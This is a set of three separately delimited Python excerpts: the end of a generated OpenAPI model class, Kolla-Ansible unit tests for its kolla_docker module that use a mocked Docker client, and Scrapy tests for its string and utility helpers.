# we must store _composed_schemas in here so the code is only run
# when we invoke this method. If we kept this at the class
        # level we would get an error because the class level
# code would be run when this module is imported, and these composed
# classes don't exist yet because their module has not finished
# loading
return {
"anyOf": [],
"allOf": [
btp_statement269.BTPStatement269,
btp_statement_expression275_all_of.BTPStatementExpression275AllOf,
],
"oneOf": [],
}
|
|
#!/usr/bin/env python
# Copyright 2016 NEC Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import imp
import os
import sys
try:
from unittest import mock
except ImportError:
import mock
from docker import errors as docker_error
from oslotest import base
this_dir = os.path.dirname(sys.modules[__name__].__file__)
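# Stub out ansible before loading kolla_docker.py: the library imports
# ansible.module_utils.basic at import time, and mocking those modules lets
# it be loaded with imp.load_source and tested outside of an Ansible run.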
sys.modules['ansible'] = mock.MagicMock()
sys.modules['ansible.module_utils'] = mock.MagicMock()
sys.modules['ansible.module_utils.basic'] = mock.MagicMock()
kolla_docker_file = os.path.join(this_dir, '..', 'ansible',
'library', 'kolla_docker.py')
kd = imp.load_source('kolla_docker', kolla_docker_file)
class ModuleArgsTest(base.BaseTestCase):
def test_module_args(self):
argument_spec = dict(
common_options=dict(required=False, type='dict', default=dict()),
action=dict(
required=True, type='str',
choices=['compare_container', 'compare_image', 'create_volume',
'get_container_env', 'get_container_state',
'pull_image', 'recreate_or_restart_container',
'remove_container', 'remove_volume',
'restart_container', 'start_container',
'stop_container']),
api_version=dict(required=False, type='str', default='auto'),
auth_email=dict(required=False, type='str'),
auth_password=dict(required=False, type='str', no_log=True),
auth_registry=dict(required=False, type='str'),
auth_username=dict(required=False, type='str'),
detach=dict(required=False, type='bool', default=True),
labels=dict(required=False, type='dict', default=dict()),
name=dict(required=False, type='str'),
environment=dict(required=False, type='dict'),
image=dict(required=False, type='str'),
ipc_mode=dict(required=False, type='str', choices=['host', '']),
cap_add=dict(required=False, type='list', default=list()),
security_opt=dict(required=False, type='list', default=list()),
pid_mode=dict(required=False, type='str', choices=['host', '']),
privileged=dict(required=False, type='bool', default=False),
graceful_timeout=dict(required=False, type='int', default=10),
remove_on_exit=dict(required=False, type='bool', default=True),
restart_policy=dict(
required=False, type='str', choices=['no',
'never',
'on-failure',
'always',
'unless-stopped']),
restart_retries=dict(required=False, type='int', default=10),
state=dict(required=False, type='str', default='running',
choices=['running',
'exited',
'paused']),
tls_verify=dict(required=False, type='bool', default=False),
tls_cert=dict(required=False, type='str'),
tls_key=dict(required=False, type='str'),
tls_cacert=dict(required=False, type='str'),
volumes=dict(required=False, type='list'),
volumes_from=dict(required=False, type='list')
)
required_if = [
['action', 'pull_image', ['image']],
['action', 'start_container', ['image', 'name']],
['action', 'compare_container', ['name']],
['action', 'compare_image', ['name']],
['action', 'create_volume', ['name']],
['action', 'get_container_env', ['name']],
['action', 'get_container_state', ['name']],
['action', 'recreate_or_restart_container', ['name']],
['action', 'remove_container', ['name']],
['action', 'remove_volume', ['name']],
['action', 'restart_container', ['name']],
['action', 'stop_container', ['name']]
]
kd.AnsibleModule = mock.MagicMock()
kd.generate_module()
kd.AnsibleModule.assert_called_with(
argument_spec=argument_spec,
required_if=required_if,
bypass_checks=False
)
FAKE_DATA = {
'params': {
'detach': True,
'environment': {},
'host_config': {
'network_mode': 'host',
'ipc_mode': '',
'cap_add': None,
'security_opt': None,
'pid_mode': '',
'privileged': False,
'volumes_from': None,
'restart_policy': 'unless-stopped',
'restart_retries': 10},
'labels': {'build-date': '2016-06-02',
'kolla_version': '2.0.1',
'license': 'GPLv2',
'name': 'ubuntu Base Image',
'vendor': 'ubuntuOS'},
'image': 'myregistrydomain.com:5000/ubuntu:16.04',
'name': 'test_container',
'volumes': None,
'tty': True
},
'images': [
{'Created': 1462317178,
'Labels': {},
'VirtualSize': 120759015,
'ParentId': '',
'RepoTags': ['myregistrydomain.com:5000/ubuntu:16.04'],
'Id': 'sha256:c5f1cf30',
'Size': 120759015},
{'Created': 1461802380,
'Labels': {},
'VirtualSize': 403096303,
'ParentId': '',
'RepoTags': ['myregistrydomain.com:5000/centos:7.0'],
'Id': 'sha256:336a6',
'Size': 403096303}
],
'containers': [
{'Created': 1463578194,
'Status': 'Up 23 hours',
'HostConfig': {'NetworkMode': 'default'},
'Id': 'e40d8e7187',
'Image': 'myregistrydomain.com:5000/ubuntu:16.04',
'ImageID': 'sha256:c5f1cf30',
'Labels': {},
'Names': '/my_container'}
],
'container_inspect': {
'Config': {
'Env': ['KOLLA_BASE_DISTRO=ubuntu',
'KOLLA_INSTALL_TYPE=binary',
'KOLLA_INSTALL_METATYPE=rdo'],
'Hostname': 'node2',
'Volumes': {'/var/lib/kolla/config_files/': {}}},
'Mounts': {},
'NetworkSettings': {},
'State': {}
}
}
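
# Test helper: build a DockerWorker around a mocked AnsibleModule and a
# mocked docker.APIClient, so each test can drive DockerWorker methods and
# assert on the calls made to the fake docker client (dw.dc).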
@mock.patch("docker.APIClient")
def get_DockerWorker(mod_param, mock_dclient):
module = mock.MagicMock()
module.params = mod_param
dw = kd.DockerWorker(module)
return dw
class TestContainer(base.BaseTestCase):
def setUp(self):
super(TestContainer, self).setUp()
self.fake_data = copy.deepcopy(FAKE_DATA)
def test_create_container(self):
self.dw = get_DockerWorker(self.fake_data['params'])
self.dw.dc.create_host_config = mock.MagicMock(
return_value=self.fake_data['params']['host_config'])
self.dw.create_container()
self.assertTrue(self.dw.changed)
self.dw.dc.create_container.assert_called_once_with(
**self.fake_data['params'])
def test_start_container_without_pull(self):
self.fake_data['params'].update({'auth_username': 'fake_user',
'auth_password': 'fake_psw',
'auth_registry': 'myrepo/myapp',
'auth_email': 'fake_mail@foogle.com'})
self.dw = get_DockerWorker(self.fake_data['params'])
self.dw.dc.images = mock.MagicMock(
return_value=self.fake_data['images'])
self.dw.dc.containers = mock.MagicMock(params={'all': 'True'})
new_container = copy.deepcopy(self.fake_data['containers'])
new_container.append({'Names': '/test_container',
'Status': 'Up 2 seconds'})
self.dw.dc.containers.side_effect = [self.fake_data['containers'],
new_container]
self.dw.check_container_differs = mock.MagicMock(return_value=False)
self.dw.create_container = mock.MagicMock()
self.dw.start_container()
self.assertFalse(self.dw.changed)
self.dw.create_container.assert_called_once_with()
def test_start_container_with_duplicate_name(self):
self.fake_data['params'].update({'name': 'my_container',
'auth_username': 'fake_user',
'auth_password': 'fake_psw',
'auth_registry': 'myrepo/myapp',
'auth_email': 'fake_mail@foogle.com'})
self.dw = get_DockerWorker(self.fake_data['params'])
self.dw.dc.images = mock.MagicMock(
return_value=self.fake_data['images'])
self.dw.dc.containers = mock.MagicMock(params={'all': 'True'})
updated_cont_list = copy.deepcopy(self.fake_data['containers'])
updated_cont_list.pop(0)
self.dw.dc.containers.side_effect = [self.fake_data['containers'],
self.fake_data['containers'],
self.fake_data['containers'],
updated_cont_list,
self.fake_data['containers']
]
self.dw.check_container_differs = mock.MagicMock(return_value=True)
self.dw.dc.remove_container = mock.MagicMock()
self.dw.create_container = mock.MagicMock()
self.dw.start_container()
self.assertTrue(self.dw.changed)
self.dw.dc.remove_container.assert_called_once_with(
container=self.fake_data['params'].get('name'),
force=True)
self.dw.create_container.assert_called_once_with()
def test_start_container(self):
self.fake_data['params'].update({'name': 'my_container',
'auth_username': 'fake_user',
'auth_password': 'fake_psw',
'auth_registry': 'myrepo/myapp',
'auth_email': 'fake_mail@foogle.com'})
self.dw = get_DockerWorker(self.fake_data['params'])
self.dw.dc.images = mock.MagicMock(
return_value=self.fake_data['images'])
self.fake_data['containers'][0].update(
{'Status': 'Exited 2 days ago'})
self.dw.dc.containers = mock.MagicMock(
return_value=self.fake_data['containers'])
self.dw.check_container_differs = mock.MagicMock(return_value=False)
self.dw.dc.start = mock.MagicMock()
self.dw.start_container()
self.assertTrue(self.dw.changed)
self.dw.dc.start.assert_called_once_with(
container=self.fake_data['params'].get('name'))
def test_stop_container(self):
self.dw = get_DockerWorker({'name': 'my_container',
'action': 'stop_container'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.stop_container()
self.assertTrue(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.dc.stop.assert_called_once_with('my_container', timeout=10)
def test_stop_container_not_exists(self):
self.dw = get_DockerWorker({'name': 'fake_container',
'action': 'stop_container'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.stop_container()
self.assertFalse(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.module.fail_json.assert_called_once_with(
msg="No such container: fake_container to stop")
def test_restart_container(self):
self.dw = get_DockerWorker({'name': 'my_container',
'action': 'restart_container'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.fake_data['container_inspect'].update(
self.fake_data['containers'][0])
self.dw.dc.inspect_container.return_value = (
self.fake_data['container_inspect'])
self.dw.restart_container()
self.assertTrue(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.dc.inspect_container.assert_called_once_with('my_container')
self.dw.dc.stop.assert_called_once_with('my_container', timeout=10)
self.dw.dc.start.assert_called_once_with('my_container')
def test_restart_container_not_exists(self):
self.dw = get_DockerWorker({'name': 'fake-container',
'action': 'restart_container'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.restart_container()
self.assertFalse(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.module.fail_json.assert_called_once_with(
msg="No such container: fake-container")
def test_remove_container(self):
self.dw = get_DockerWorker({'name': 'my_container',
'action': 'remove_container'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.remove_container()
self.assertTrue(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.dc.remove_container.assert_called_once_with(
container='my_container',
force=True
)
def test_get_container_env(self):
fake_env = dict(KOLLA_BASE_DISTRO='ubuntu',
KOLLA_INSTALL_TYPE='binary',
KOLLA_INSTALL_METATYPE='rdo')
self.dw = get_DockerWorker({'name': 'my_container',
'action': 'get_container_env'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.fake_data['container_inspect'].update(
self.fake_data['containers'][0])
self.dw.dc.inspect_container.return_value = (
self.fake_data['container_inspect'])
self.dw.get_container_env()
self.assertFalse(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.dc.inspect_container.assert_called_once_with('my_container')
self.dw.module.exit_json.assert_called_once_with(**fake_env)
def test_get_container_env_negative(self):
self.dw = get_DockerWorker({'name': 'fake_container',
'action': 'get_container_env'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.get_container_env()
self.assertFalse(self.dw.changed)
self.dw.module.fail_json.assert_called_once_with(
msg="No such container: fake_container")
def test_get_container_state(self):
State = {'Dead': False,
'ExitCode': 0,
'Pid': 12475,
'StartedAt': u'2016-06-07T11:22:37.66876269Z',
'Status': u'running'}
self.fake_data['container_inspect'].update({'State': State})
self.dw = get_DockerWorker({'name': 'my_container',
'action': 'get_container_state'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.dc.inspect_container.return_value = (
self.fake_data['container_inspect'])
self.dw.get_container_state()
self.assertFalse(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.dc.inspect_container.assert_called_once_with('my_container')
self.dw.module.exit_json.assert_called_once_with(**State)
def test_get_container_state_negative(self):
self.dw = get_DockerWorker({'name': 'fake_container',
'action': 'get_container_state'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.get_container_state()
self.assertFalse(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.module.fail_json.assert_called_once_with(
msg="No such container: fake_container")
def test_recreate_or_restart_container_not_container(self):
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ALWAYS')})
self.dw.check_container = mock.Mock(return_value=None)
self.dw.start_container = mock.Mock()
self.dw.recreate_or_restart_container()
self.dw.start_container.assert_called_once_with()
def test_recreate_or_restart_container_container_copy_always(self):
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ALWAYS')})
self.dw.check_container = mock.Mock(
return_value=self.fake_data['containers'][0])
self.dw.restart_container = mock.Mock()
self.dw.check_container_differs = mock.Mock(return_value=False)
self.dw.recreate_or_restart_container()
self.dw.restart_container.assert_called_once_with()
def test_recreate_or_restart_container_container_copy_always_differs(self):
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ALWAYS')})
self.dw.check_container = mock.Mock(
return_value=self.fake_data['containers'][0])
self.dw.start_container = mock.Mock()
self.dw.remove_container = mock.Mock()
self.dw.check_container_differs = mock.Mock(return_value=True)
self.dw.recreate_or_restart_container()
self.dw.remove_container.assert_called_once_with()
self.dw.start_container.assert_called_once_with()
def test_recreate_or_restart_container_container_copy_once(self):
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ONCE')})
self.dw.check_container = mock.Mock(
return_value=self.fake_data['containers'][0])
self.dw.start_container = mock.Mock()
self.dw.remove_container = mock.Mock()
self.dw.recreate_or_restart_container()
self.dw.remove_container.assert_called_once_with()
self.dw.start_container.assert_called_once_with()
class TestImage(base.BaseTestCase):
def setUp(self):
super(TestImage, self).setUp()
self.fake_data = copy.deepcopy(FAKE_DATA)
def test_check_image(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.images.return_value = self.fake_data['images']
return_data = self.dw.check_image()
self.assertFalse(self.dw.changed)
self.dw.dc.images.assert_called_once_with()
self.assertEqual(self.fake_data['images'][0], return_data)
def test_check_image_before_docker_1_12(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/centos:7.0'})
self.fake_data['images'][0]['RepoTags'] = []
self.dw.dc.images.return_value = self.fake_data['images']
return_data = self.dw.check_image()
self.assertFalse(self.dw.changed)
self.dw.dc.images.assert_called_once_with()
self.assertEqual(self.fake_data['images'][1], return_data)
def test_check_image_docker_1_12(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/centos:7.0'})
self.fake_data['images'][0]['RepoTags'] = None
self.dw.dc.images.return_value = self.fake_data['images']
return_data = self.dw.check_image()
self.assertFalse(self.dw.changed)
self.dw.dc.images.assert_called_once_with()
self.assertEqual(self.fake_data['images'][1], return_data)
def test_compare_image(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.images.return_value = self.fake_data['images']
container_info = {'Image': 'sha256:c5f1cf40',
'Config': {'myregistrydomain.com:5000/ubuntu:16.04'}
}
return_data = self.dw.compare_image(container_info)
self.assertFalse(self.dw.changed)
self.dw.dc.images.assert_called_once_with()
self.assertTrue(return_data)
def test_get_image_id_not_exists(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.images.return_value = []
return_data = self.dw.get_image_id()
self.assertIsNone(return_data)
def test_get_image_id_exists(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.images.return_value = ['sha256:47c3bdbcf99f0c1a36e4db']
return_data = self.dw.get_image_id()
self.assertEqual('sha256:47c3bdbcf99f0c1a36e4db', return_data)
def test_pull_image_new(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04',
'auth_username': 'fake_user',
'auth_password': 'fake_psw',
'auth_registry': 'myrepo/myapp',
'auth_email': 'fake_mail@foogle.com'
})
self.dw.dc.pull.return_value = [
b'{"status":"Pull complete","progressDetail":{},"id":"22f7"}\r\n',
b'{"status":"Digest: sha256:47c3bdbcf99f0c1a36e4db"}\r\n',
b'{"status":"Downloaded newer image for ubuntu:16.04"}\r\n'
]
self.dw.dc.images.side_effect = [
[],
['sha256:47c3bdbcf99f0c1a36e4db']
]
self.dw.pull_image()
self.dw.dc.pull.assert_called_once_with(
repository='myregistrydomain.com:5000/ubuntu',
tag='16.04',
stream=True)
self.assertTrue(self.dw.changed)
def test_pull_image_exists(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.pull.return_value = [
b'{"status":"Pull complete","progressDetail":{},"id":"22f7"}\r\n',
b'{"status":"Digest: sha256:47c3bdbf0c1a36e4db"}\r\n',
b'{"status":"mage is up to date for ubuntu:16.04"}\r\n'
]
self.dw.dc.images.side_effect = [
['sha256:47c3bdbcf99f0c1a36e4db'],
['sha256:47c3bdbcf99f0c1a36e4db']
]
self.dw.pull_image()
self.dw.dc.pull.assert_called_once_with(
repository='myregistrydomain.com:5000/ubuntu',
tag='16.04',
stream=True)
self.assertFalse(self.dw.changed)
def test_pull_image_not_exists(self):
self.dw = get_DockerWorker(
{'image': 'unknown:16.04'})
self.dw.dc.pull.return_value = [
b'{"error": "image unknown not found"}\r\n']
self.dw.pull_image()
self.dw.dc.pull.assert_called_once_with(
repository='unknown',
tag='16.04',
stream=True)
self.assertFalse(self.dw.changed)
self.dw.module.fail_json.assert_called_once_with(
msg="The requested image does not exist: unknown:16.04",
failed=True)
def test_pull_image_error(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.pull.return_value = [
b'{"error": "unexpected error"}\r\n']
self.dw.pull_image()
self.dw.dc.pull.assert_called_once_with(
repository='myregistrydomain.com:5000/ubuntu',
tag='16.04',
stream=True)
self.assertFalse(self.dw.changed)
self.dw.module.fail_json.assert_called_once_with(
msg="Unknown error message: unexpected error",
failed=True)
class TestVolume(base.BaseTestCase):
def setUp(self):
super(TestVolume, self).setUp()
self.fake_data = copy.deepcopy(FAKE_DATA)
self.volumes = {
'Volumes':
[{'Driver': u'local',
'Labels': None,
'Mountpoint': '/var/lib/docker/volumes/nova_compute/_data',
'Name': 'nova_compute'},
{'Driver': 'local',
'Labels': None,
'Mountpoint': '/var/lib/docker/volumes/mariadb/_data',
'Name': 'mariadb'}]
}
def test_create_volume(self):
self.dw = get_DockerWorker({'name': 'rabbitmq',
'action': 'create_volume'})
self.dw.dc.volumes.return_value = self.volumes
self.dw.create_volume()
self.dw.dc.volumes.assert_called_once_with()
self.assertTrue(self.dw.changed)
self.dw.dc.create_volume.assert_called_once_with(
name='rabbitmq',
driver='local')
def test_create_volume_exists(self):
self.dw = get_DockerWorker({'name': 'nova_compute',
'action': 'create_volume'})
self.dw.dc.volumes.return_value = self.volumes
self.dw.create_volume()
self.dw.dc.volumes.assert_called_once_with()
self.assertFalse(self.dw.changed)
def test_remove_volume(self):
self.dw = get_DockerWorker({'name': 'nova_compute',
'action': 'remove_volume'})
self.dw.dc.volumes.return_value = self.volumes
self.dw.remove_volume()
self.assertTrue(self.dw.changed)
self.dw.dc.remove_volume.assert_called_once_with(name='nova_compute')
def test_remove_volume_not_exists(self):
self.dw = get_DockerWorker({'name': 'rabbitmq',
'action': 'remove_volume'})
self.dw.dc.volumes.return_value = self.volumes
self.dw.remove_volume()
self.assertFalse(self.dw.changed)
def test_remove_volume_exception(self):
resp = mock.MagicMock()
resp.status_code = 409
docker_except = docker_error.APIError('test error', resp)
self.dw = get_DockerWorker({'name': 'nova_compute',
'action': 'remove_volume'})
self.dw.dc.volumes.return_value = self.volumes
self.dw.dc.remove_volume.side_effect = docker_except
self.assertRaises(docker_error.APIError, self.dw.remove_volume)
self.assertTrue(self.dw.changed)
self.dw.module.fail_json.assert_called_once_with(
failed=True,
msg="Volume named 'nova_compute' is currently in-use"
)
class TestAttrComp(base.BaseTestCase):
def setUp(self):
super(TestAttrComp, self).setUp()
self.fake_data = copy.deepcopy(FAKE_DATA)
def test_compare_cap_add_neg(self):
container_info = {'HostConfig': dict(CapAdd=['data'])}
self.dw = get_DockerWorker({'cap_add': ['data']})
self.assertFalse(self.dw.compare_cap_add(container_info))
def test_compare_cap_add_pos(self):
container_info = {'HostConfig': dict(CapAdd=['data1'])}
self.dw = get_DockerWorker({'cap_add': ['data2']})
self.assertTrue(self.dw.compare_cap_add(container_info))
def test_compare_ipc_mode_neg(self):
container_info = {'HostConfig': dict(IpcMode='data')}
self.dw = get_DockerWorker({'ipc_mode': 'data'})
self.assertFalse(self.dw.compare_ipc_mode(container_info))
def test_compare_ipc_mode_pos(self):
container_info = {'HostConfig': dict(IpcMode='data1')}
self.dw = get_DockerWorker({'ipc_mode': 'data2'})
self.assertTrue(self.dw.compare_ipc_mode(container_info))
def test_compare_security_opt_neg(self):
container_info = {'HostConfig': dict(SecurityOpt=['data'])}
self.dw = get_DockerWorker({'security_opt': ['data']})
self.assertFalse(self.dw.compare_security_opt(container_info))
def test_compare_security_opt_pos(self):
container_info = {'HostConfig': dict(SecurityOpt=['data1'])}
self.dw = get_DockerWorker({'security_opt': ['data2']})
self.assertTrue(self.dw.compare_security_opt(container_info))
def test_compare_pid_mode_neg(self):
container_info = {'HostConfig': dict(PidMode='host')}
self.dw = get_DockerWorker({'pid_mode': 'host'})
self.assertFalse(self.dw.compare_pid_mode(container_info))
def test_compare_pid_mode_pos(self):
container_info = {'HostConfig': dict(PidMode='host1')}
self.dw = get_DockerWorker({'pid_mode': 'host2'})
self.assertTrue(self.dw.compare_pid_mode(container_info))
def test_compare_privileged_neg(self):
container_info = {'HostConfig': dict(Privileged=True)}
self.dw = get_DockerWorker({'privileged': True})
self.assertFalse(self.dw.compare_privileged(container_info))
def test_compare_privileged_pos(self):
container_info = {'HostConfig': dict(Privileged=True)}
self.dw = get_DockerWorker({'privileged': False})
self.assertTrue(self.dw.compare_privileged(container_info))
def test_compare_labels_neg(self):
container_info = {'Config': dict(Labels={'kolla_version': '2.0.1'})}
self.dw = get_DockerWorker({'labels': {'kolla_version': '2.0.1'}})
self.dw.check_image = mock.MagicMock(return_value=dict(
Labels={'kolla_version': '2.0.1'}))
self.assertFalse(self.dw.compare_labels(container_info))
def test_compare_labels_pos(self):
container_info = {'Config': dict(Labels={'kolla_version': '1.0.1'})}
self.dw = get_DockerWorker({'labels': {'kolla_version': '2.0.1'}})
self.dw.check_image = mock.MagicMock(return_value=dict(
Labels={'kolla_version': '1.0.1'}))
self.assertTrue(self.dw.compare_labels(container_info))
def test_compare_volumes_from_neg(self):
container_info = {'HostConfig': dict(VolumesFrom=['777f7dc92da7'])}
self.dw = get_DockerWorker({'volumes_from': ['777f7dc92da7']})
self.assertFalse(self.dw.compare_volumes_from(container_info))
def test_compare_volumes_from_post(self):
container_info = {'HostConfig': dict(VolumesFrom=['777f7dc92da7'])}
self.dw = get_DockerWorker({'volumes_from': ['ba8c0c54f0f2']})
self.assertTrue(self.dw.compare_volumes_from(container_info))
def test_compare_volumes_neg(self):
container_info = {
'Config': dict(Volumes=['/var/log/kolla/']),
'HostConfig': dict(Binds=['kolla_logs:/var/log/kolla/:rw'])}
self.dw = get_DockerWorker(
{'volumes': ['kolla_logs:/var/log/kolla/:rw']})
self.assertFalse(self.dw.compare_volumes(container_info))
def test_compare_volumes_pos(self):
container_info = {
'Config': dict(Volumes=['/var/log/kolla/']),
'HostConfig': dict(Binds=['kolla_logs:/var/log/kolla/:rw'])}
self.dw = get_DockerWorker(
{'volumes': ['/dev/:/dev/:rw']})
self.assertTrue(self.dw.compare_volumes(container_info))
def test_compare_environment_neg(self):
container_info = {'Config': dict(
Env=['KOLLA_CONFIG_STRATEGY=COPY_ALWAYS',
'KOLLA_BASE_DISTRO=ubuntu',
'KOLLA_INSTALL_TYPE=binary']
)}
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ALWAYS',
KOLLA_BASE_DISTRO='ubuntu',
KOLLA_INSTALL_TYPE='binary')})
self.assertFalse(self.dw.compare_environment(container_info))
def test_compare_environment_pos(self):
container_info = {'Config': dict(
Env=['KOLLA_CONFIG_STRATEGY=COPY_ALWAYS',
'KOLLA_BASE_DISTRO=ubuntu',
'KOLLA_INSTALL_TYPE=binary']
)}
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ALWAYS',
KOLLA_BASE_DISTRO='centos',
KOLLA_INSTALL_TYPE='binary')})
self.assertTrue(self.dw.compare_environment(container_info))
def test_compare_container_state_neg(self):
container_info = {'State': dict(Status='running')}
self.dw = get_DockerWorker({'state': 'running'})
self.assertFalse(self.dw.compare_container_state(container_info))
def test_compare_container_state_pos(self):
container_info = {'State': dict(Status='running')}
self.dw = get_DockerWorker({'state': 'exited'})
self.assertTrue(self.dw.compare_container_state(container_info))
|
|
import functools
import gc
import operator
import platform
import unittest
from itertools import count
from warnings import catch_warnings
from scrapy.utils.python import (
memoizemethod_noargs, binary_is_text, equal_attributes,
WeakKeyCache, get_func_args, to_bytes, to_unicode,
without_none_values, MutableChain)
__doctests__ = ['scrapy.utils.python']
class MutableChainTest(unittest.TestCase):
def test_mutablechain(self):
m = MutableChain(range(2), [2, 3], (4, 5))
m.extend(range(6, 7))
m.extend([7, 8])
m.extend([9, 10], (11, 12))
self.assertEqual(next(m), 0)
self.assertEqual(m.__next__(), 1)
with catch_warnings(record=True) as warnings:
self.assertEqual(m.next(), 2)
self.assertEqual(len(warnings), 1)
self.assertIn('scrapy.utils.python.MutableChain.__next__',
str(warnings[0].message))
self.assertEqual(list(m), list(range(3, 13)))
class ToUnicodeTest(unittest.TestCase):
def test_converting_an_utf8_encoded_string_to_unicode(self):
self.assertEqual(to_unicode(b'lel\xc3\xb1e'), u'lel\xf1e')
def test_converting_a_latin_1_encoded_string_to_unicode(self):
self.assertEqual(to_unicode(b'lel\xf1e', 'latin-1'), u'lel\xf1e')
def test_converting_a_unicode_to_unicode_should_return_the_same_object(self):
self.assertEqual(to_unicode(u'\xf1e\xf1e\xf1e'), u'\xf1e\xf1e\xf1e')
def test_converting_a_strange_object_should_raise_TypeError(self):
self.assertRaises(TypeError, to_unicode, 423)
def test_errors_argument(self):
self.assertEqual(
to_unicode(b'a\xedb', 'utf-8', errors='replace'),
u'a\ufffdb'
)
class ToBytesTest(unittest.TestCase):
def test_converting_a_unicode_object_to_an_utf_8_encoded_string(self):
self.assertEqual(to_bytes(u'\xa3 49'), b'\xc2\xa3 49')
def test_converting_a_unicode_object_to_a_latin_1_encoded_string(self):
self.assertEqual(to_bytes(u'\xa3 49', 'latin-1'), b'\xa3 49')
def test_converting_a_regular_bytes_to_bytes_should_return_the_same_object(self):
self.assertEqual(to_bytes(b'lel\xf1e'), b'lel\xf1e')
def test_converting_a_strange_object_should_raise_TypeError(self):
self.assertRaises(TypeError, to_bytes, unittest)
def test_errors_argument(self):
self.assertEqual(
to_bytes(u'a\ufffdb', 'latin-1', errors='replace'),
b'a?b'
)
class MemoizedMethodTest(unittest.TestCase):
def test_memoizemethod_noargs(self):
class A(object):
@memoizemethod_noargs
def cached(self):
return object()
def noncached(self):
return object()
a = A()
one = a.cached()
two = a.cached()
three = a.noncached()
assert one is two
assert one is not three
class BinaryIsTextTest(unittest.TestCase):
def test_binaryistext(self):
assert binary_is_text(b"hello")
def test_utf_16_strings_contain_null_bytes(self):
assert binary_is_text(u"hello".encode('utf-16'))
def test_one_with_encoding(self):
assert binary_is_text(b"<div>Price \xa3</div>")
def test_real_binary_bytes(self):
assert not binary_is_text(b"\x02\xa3")
class UtilsPythonTestCase(unittest.TestCase):
def test_equal_attributes(self):
class Obj:
pass
a = Obj()
b = Obj()
        # no attributes given: returns False
self.assertFalse(equal_attributes(a, b, []))
        # non-existent attributes
self.assertFalse(equal_attributes(a, b, ['x', 'y']))
a.x = 1
b.x = 1
# equal attribute
self.assertTrue(equal_attributes(a, b, ['x']))
b.y = 2
# obj1 has no attribute y
self.assertFalse(equal_attributes(a, b, ['x', 'y']))
a.y = 2
# equal attributes
self.assertTrue(equal_attributes(a, b, ['x', 'y']))
a.y = 1
        # different attributes
self.assertFalse(equal_attributes(a, b, ['x', 'y']))
# test callable
a.meta = {}
b.meta = {}
self.assertTrue(equal_attributes(a, b, ['meta']))
        # compare obj.meta['z'] via a callable
a.meta['z'] = 1
b.meta['z'] = 1
get_z = operator.itemgetter('z')
get_meta = operator.attrgetter('meta')
compare_z = lambda obj: get_z(get_meta(obj))
self.assertTrue(equal_attributes(a, b, [compare_z, 'x']))
# fail z equality
a.meta['z'] = 2
self.assertFalse(equal_attributes(a, b, [compare_z, 'x']))
def test_weakkeycache(self):
class _Weakme(object): pass
_values = count()
wk = WeakKeyCache(lambda k: next(_values))
k = _Weakme()
v = wk[k]
self.assertEqual(v, wk[k])
self.assertNotEqual(v, wk[_Weakme()])
self.assertEqual(v, wk[k])
del k
for _ in range(100):
if wk._weakdict:
gc.collect()
self.assertFalse(len(wk._weakdict))
def test_get_func_args(self):
def f1(a, b, c):
pass
def f2(a, b=None, c=None):
pass
class A(object):
def __init__(self, a, b, c):
pass
def method(self, a, b, c):
pass
class Callable(object):
def __call__(self, a, b, c):
pass
a = A(1, 2, 3)
cal = Callable()
partial_f1 = functools.partial(f1, None)
partial_f2 = functools.partial(f1, b=None)
partial_f3 = functools.partial(partial_f2, None)
self.assertEqual(get_func_args(f1), ['a', 'b', 'c'])
self.assertEqual(get_func_args(f2), ['a', 'b', 'c'])
self.assertEqual(get_func_args(A), ['a', 'b', 'c'])
self.assertEqual(get_func_args(a.method), ['a', 'b', 'c'])
self.assertEqual(get_func_args(partial_f1), ['b', 'c'])
self.assertEqual(get_func_args(partial_f2), ['a', 'c'])
self.assertEqual(get_func_args(partial_f3), ['c'])
